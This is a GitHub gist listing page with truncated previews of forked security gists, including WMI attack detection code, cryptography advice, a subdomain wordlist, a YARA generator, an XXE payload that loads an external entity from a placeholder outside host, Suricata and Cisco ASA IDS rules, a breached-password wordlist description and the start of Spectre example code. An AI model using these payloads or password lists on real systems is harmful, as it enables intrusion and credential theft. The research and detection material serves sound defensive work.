m00zh33’s gists

m00zh33 / WMI_attack_detection.ps1

Created June 29, 2017 01:37 — forked from mattifestation/WMI_attack_detection.ps1

BlueHat 2016 - WMI attack detection demo

	#region Scriptblocks that will execute upon alert trigger
	$LateralMovementDetected = {
	$Event = $EventArgs.NewEvent

	$EventTime = [DateTime]::FromFileTime($Event.TIME_CREATED)

	$MethodName = $Event.MethodName
	$Namespace = $Event.Namespace
	$Object = $Event.ObjectPath
	$User = $Event.User

m00zh33 / gist:c871fff5261633c702a3cb4003519979

Created July 5, 2017 02:32 — forked from atoponce/gist:07d8d4c833873be2f68c34f9afc5a78a

Cryptographic Best Practices

Symmetric Encryption

The only way to encrypt today is authenticated encryption, or "AEAD". ChaCha20-Poly1305 is faster in software than AES-GCM. AES-GCM will be faster than ChaCha20-Poly1305 with AES-NI. Poly1305 is also easier than GCM for library designers to implement safely. AES-GCM is the industry standard.

Use, in order of preference:

The NaCl/libsodium default

m00zh33 / all.txt

Created July 17, 2017 15:38 — forked from jhaddix/all.txt

dnsall

This file has been truncated, but you can view the full file.


	@
	*
	0
	00
	0-0
	000
	0000
	00000
	000000

m00zh33 / yara_fn.py

Created July 24, 2017 14:59 — forked from williballenthin/yara_fn.py

generate a yara rule that matches the basic blocks of the current function in IDA Pro

	'''
	IDAPython script that generates a YARA rule to match against the
	basic blocks of the current function. It masks out relocation bytes
	and ignores jump instructions (given that we're already trying to
	match compiler-specific bytes, this is of arguable benefit).

	If python-yara is installed, the IDAPython script also validates that
	the generated rule matches at least one segment in the current file.

	author: Willi Ballenthin <[email protected]>

m00zh33 / XXE_payloads

Created August 12, 2017 22:45 — forked from staaldraad/XXE_payloads

XXE Payloads

	--------------------------------------------------------------
	Vanilla, used to verify outbound xxe or blind xxe
	--------------------------------------------------------------

	<?xml version="1.0" ?>
	<!DOCTYPE r [
	<!ELEMENT r ANY >
	<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
	]>
	<r>&sp;</r>

m00zh33 / protoanomalies.rules

Created December 1, 2017 01:18 — forked from mpurzynski/protoanomalies.rules

Suricata rules for protocol anomalies

	alert tcp any any -> any !80 (msg:"SURICATA HTTP on unusual port"; flow:to_server; app-layer-protocol:http; threshold: type limit, track by_src, seconds 60, count 1; sid:2271001; rev:1;)
	alert tcp any any -> any 80 (msg:"SURICATA non-HTTP on TCP port 80"; flow:to_server; app-layer-protocol:!http; threshold: type limit, track by_src, seconds 60, count 1; sid:2271002; rev:1;)

	alert tcp any any -> any ![443,465,587] (msg:"SURICATA TLS on unusual port"; flow:to_server; app-layer-protocol:tls; threshold: type limit, track by_src, seconds 60, count 1; sid:2271004; rev:1;)
	alert tcp any any -> any [443,465] (msg:"SURICATA non-TLS on TLS port"; flow:to_server; app-layer-protocol:!tls; threshold: type limit, track by_src, seconds 60, count 1; sid:2271003; rev:1;)

	alert tcp any any -> any ![20,21] (msg:"SURICATA FTP on unusual TCP port"; flow:to_server; app-layer-protocol:ftp; threshold: type limit, track by_src, seconds 60, count 1; sid:2271005; rev:1;)
	alert tcp any any -> any [20,21] (msg:"SURICATA non-FTP on TCP

m00zh33 / breachcompilation.txt

Created December 20, 2017 02:54

1.4 billion password breach compilation wordlist

	wordlist created from original 41G stash via:

	grep -rohP '(?<=:).*$' \| uniq > breachcompilation.txt

	Then, compressed with:

	7z a breachcompilation.txt.7z breachcompilation.txt

	Size:

m00zh33 / spectre.c

Created January 9, 2018 08:28 — forked from ErikAugust/spectre.c

Spectre example code

	#include <stdio.h>
	#include <stdlib.h>
	#include <stdint.h>
	#ifdef _MSC_VER
	#include <intrin.h> /* for rdtscp and clflush */
	#pragma optimize("gt",on)
	#else
	#include <x86intrin.h> /* for rdtscp and clflush */
	#endif

m00zh33 / qemu_osx_rpi_raspbian_jessie.sh

Created January 25, 2018 09:51 — forked from hfreire/qemu_osx_rpi_raspbian_jessie.sh

How to emulate a Raspberry Pi (Raspbian Jessie) on Mac OSX (El Capitan)

	# Install QEMU OSX port with ARM support
	sudo port install qemu +target_arm
	export QEMU=$(which qemu-system-arm)

	# Dowload kernel and export location
	curl -OL \
	https://github.com/dhruvvyas90/qemu-rpi-kernel/blob/master/kernel-qemu-4.1.7-jessie
	export RPI_KERNEL=./kernel-qemu-4.1.7-jessie

	# Download filesystem and export location

m00zh33 / CVE-2018-0101.rules

Created February 1, 2018 01:07 — forked from fox-srt/CVE-2018-0101.rules

Cisco ASA RCE / CVE-2018-0101 IDS Signatures

	# IDS signatures for https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180129-asa1:
	alert udp any any -> any 500 (msg:"FOX-SRT - Suspicious - Possible Fragmented Cisco IKE/isakmp Packet HeapSpray (CVE-2018-0101)"; flow:to_server; content:"\|84\|"; offset:16; depth:1; content:"\|02 08 \|"; distance:1; within:2; fast_pattern; byte_test:4,>,5000,4,relative; byte_test:2,>,5000,10,relative; byte_extract:4,36,fragment_match; byte_test:4,=,fragment_match,52,relative; byte_test:4,=,fragment_match,136,relative; byte_test:4,=,fragment_match,236,relative; threshold:type limit, track by_dst, count 1, seconds 600; classtype:attempted-admin; sid:21002339; rev:4;)
	alert udp any any -> any 500 (msg:"FOX-SRT - Exploit - Possible Shellcode in Cisco IKE/isakmp - tcp/CONNECT/"; content:"tcp/CONNECT/"; fast_pattern:only; threshold:type limit, track by_src, count 1, seconds 600; priority:1; classtype:attempted-admin; sid:21002340; rev:2;)